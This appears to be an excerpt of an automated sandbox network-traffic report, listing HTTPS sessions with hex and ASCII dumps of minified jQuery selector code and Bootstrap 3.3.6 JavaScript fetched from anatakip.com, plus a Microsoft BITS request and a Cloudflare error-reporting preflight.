                    2024-05-26 22:57:33 UTC1369INData Raw: 2c 4d 3d 22 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 5c 78 30 30 2d 5c 5c 78 61 30 5d 29 2b 22 2c 4e 3d 22 5c 5c 5b 22 2b 4c 2b 22 2a 28 22 2b 4d 2b 22 29 28 3f 3a 22 2b 4c 2b 22 2a 28 5b 2a 5e 24 7c 21 7e 5d 3f 3d 29 22 2b 4c 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 4d 2b 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22
                    Data Ascii: ,M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"
                    2024-05-26 22:57:33 UTC1369INData Raw: 6c 64 4e 6f 64 65 73 29 2c 45 5b 76 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 61 29 7b 48 3d 7b 61 70 70 6c 79 3a 45 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 47 2e 61 70 70 6c 79 28 61 2c 49 2e 63 61 6c 6c 28 62 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 77 68 69 6c 65 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66
                    Data Ascii: ldNodes),E[v.childNodes.length].nodeType}catch(ea){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if
                    2024-05-26 22:57:33 UTC1369INData Raw: 21 61 28 62 29 7d 63 61 74 63 68 28 63 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 2c 62 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 7c 22 29 2c 65 3d 63 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 2e 61 74 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65
                    Data Ascii: !a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function ja(a,b){var c=a.split("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.source
                    2024-05-26 22:57:33 UTC1369INData Raw: 79 43 6c 61 73 73 4e 61 6d 65 3d 5a 2e 74 65 73 74 28 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 63 2e 67 65 74 42 79 49 64 3d 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2e 69 64 3d 75 2c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28
                    Data Ascii: yClassName=Z.test(n.getElementsByClassName),c.getById=ia(function(a){return o.appendChild(a).id=u,!n.getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(
                    2024-05-26 22:57:33 UTC1369INData Raw: 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 7d 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e
                    Data Ascii: -]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("n
                    2024-05-26 22:57:33 UTC1369INData Raw: 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74
                    Data Ascii: ent===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.549724184.28.90.27443
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    Accept-Encoding: identity
                    User-Agent: Microsoft BITS/7.8
                    Host: fs.microsoft.com
                    2024-05-26 22:57:34 UTC467INHTTP/1.1 200 OK
                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                    Content-Type: application/octet-stream
                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                    Server: ECAcc (lpl/EF06)
                    X-CID: 11
                    X-Ms-ApiVersion: Distribute 1.2
                    X-Ms-Region: prod-weu-z1
                    Cache-Control: public, max-age=234701
                    Date: Sun, 26 May 2024 22:57:33 GMT
                    Connection: close
                    X-CID: 2


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.54972635.190.80.14433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC531OUTOPTIONS /report/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3D HTTP/1.1
                    Host: a.nel.cloudflare.com
                    Connection: keep-alive
                    Origin: https://anatakip.com
                    Access-Control-Request-Method: POST
                    Access-Control-Request-Headers: content-type
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:34 UTC336INHTTP/1.1 200 OK
                    content-length: 0
                    access-control-max-age: 86400
                    access-control-allow-methods: OPTIONS, POST
                    access-control-allow-origin: *
                    access-control-allow-headers: content-length, content-type
                    date: Sun, 26 May 2024 22:57:33 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.549728104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC620OUTGET /assets/bootstrap/js/bootstrap.min.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:34 UTC772INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 00:51:38 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 338755
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fRVXRuCiYH95wdN83SNMS8i1gav7Ar97sj1R3NGD6kC2Pd5Wv%2Fn6pq5YznLQydIZwviDhGDpdXt%2BA9XH9Aucs2oqCrwqcqPkx8KX%2BH8r5KiFP0uVUmqZDvmVPVnHqE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d6e48c3729e-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:34 UTC597INData Raw: 37 63 61 64 0d 0a 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 36 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0d 0a 20 2a 2f 0d 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62
                    Data Ascii: 7cad/*! * Bootstrap v3.3.6 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b
                    2024-05-26 22:57:34 UTC1369INData Raw: 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 20 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 2e 73 74 79 6c 65 5b 63 5d 29 72 65 74 75 72 6e 7b 65 6e 64 3a 62 5b 63 5d 7d 3b 72 65 74 75 72 6e 21 31 7d 61 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 21 31 2c 64 3d 74 68 69 73 3b 61 28 74 68 69 73 29 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 3d 21 30 7d 29
                    Data Ascii: n:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0})
                    2024-05-26 22:57:34 UTC1369INData Raw: 3b 76 61 72 20 65 3d 61 2e 66 6e 2e 61 6c 65 72 74 3b 61 2e 66 6e 2e 61 6c 65 72 74 3d 62 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 64 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 61 6c 65 72 74 3d 65 2c 74 68 69 73 7d 2c 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 63 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                    Data Ascii: ;var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){v
                    2024-05-26 22:57:34 UTC1369INData Raw: 28 22 63 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 62 75 74 74 6f 6e 3b 61 2e 66 6e 2e 62 75 74 74 6f 6e 3d 62 2c 61 2e 66 6e 2e 62 75 74 74 6f 6e 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 63 2c 61 2e 66 6e 2e 62 75 74 74 6f 6e 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 62 75 74 74 6f 6e 3d 64 2c 74 68 69 73 7d 2c 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e
                    Data Ascii: ("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on
                    2024-05-26 22:57:34 UTC1369INData Raw: 22 6d 6f 75 73 65 65 6e 74 65 72 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 70 61 75 73 65 2c 74 68 69 73 29 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 79 63 6c 65 2c 74 68 69 73 29 29 7d 3b 63 2e 56 45 52 53 49 4f 4e 3d 22 33 2e 33 2e 36 22 2c 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 3d 36 30 30 2c 63 2e 44 45 46 41 55 4c 54 53 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 2c 6b 65 79 62 6f 61 72 64 3a 21 30 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65
                    Data Ascii: "mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.6",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|te
                    2024-05-26 22:57:34 UTC1369INData Raw: 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 2e 65 6e 64 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 76 6f 69 64 20 30 3a 74 68 69 73 2e 73 6c 69 64 65 28 22 6e 65 78 74 22 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 76 6f
                    Data Ascii: ort.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){return this.sliding?void 0:this.slide("next")},c.prototype.prev=function(){return this.sliding?vo
                    2024-05-26 22:57:34 UTC1369INData Raw: 62 2c 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 63 2c 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3d 64 2c 74 68 69 73 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 2c 65 3d 61 28 74 68 69 73 29 2c 66 3d 61 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 7c 7c 28 64 3d 65 2e 61 74 74 72 28 22 68 72 65 66 22 29 29 26 26 64 2e 72 65 70 6c 61 63 65 28 2f 2e 2a 28 3f 3d 23 5b 5e 5c 73 5d 2b 24 29 2f 2c 22 22 29 29 3b 69 66 28 66 2e 68 61 73 43 6c 61 73 73 28 22 63 61 72 6f 75 73 65 6c 22 29 29 7b 76 61 72 20 67 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 66 2e
                    Data Ascii: b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.
                    2024-05-26 22:57:34 UTC1369INData Raw: 45 52 53 49 4f 4e 3d 22 33 2e 33 2e 36 22 2c 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 3d 33 35 30 2c 64 2e 44 45 46 41 55 4c 54 53 3d 7b 74 6f 67 67 6c 65 3a 21 30 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 6d 65 6e 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 77 69 64 74 68 22 29 3b 72 65 74 75 72 6e 20 61 3f 22 77 69 64 74 68 22 3a 22 68 65 69 67 68 74 22 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 21 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 29 7b 76 61 72 20 62 2c 65 3d 74 68
                    Data Ascii: ERSION="3.3.6",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=th
                    2024-05-26 22:57:34 UTC1369INData Raw: 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 69 6e 67 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 20 69 6e 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 74 68 69 73 2e 24 74 72 69 67 67 65 72 2e 61 64 64 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 64 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 31 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 30 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 69 6e 67 22 29 2e 61 64 64 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 22 29 2e 74 72
                    Data Ascii: Class("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").tr
                    2024-05-26 22:57:34 UTC1369INData Raw: 63 65 28 2f 2e 2a 28 3f 3d 23 5b 5e 5c 73 5d 2a 24 29 2f 2c 22 22 29 29 3b 76 61 72 20 64 3d 63 26 26 61 28 63 29 3b 72 65 74 75 72 6e 20 64 26 26 64 2e 6c 65 6e 67 74 68 3f 64 3a 62 2e 70 61 72 65 6e 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 63 29 7b 63 26 26 33 3d 3d 3d 63 2e 77 68 69 63 68 7c 7c 28 61 28 65 29 2e 72 65 6d 6f 76 65 28 29 2c 61 28 66 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 64 3d 61 28 74 68 69 73 29 2c 65 3d 62 28 64 29 2c 66 3d 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 74 68 69 73 7d 3b 65 2e 68 61 73 43 6c 61 73 73 28 22 6f 70 65 6e 22 29 26 26 28 63 26 26 22 63 6c 69 63 6b 22 3d 3d 63 2e 74 79 70 65 26 26 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 63 2e 74 61 72 67 65 74 2e 74
                    Data Ascii: ce(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.t


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.549727104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC638OUTGET /assets/scripts/fancybox/source/jquery.fancybox.pack.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
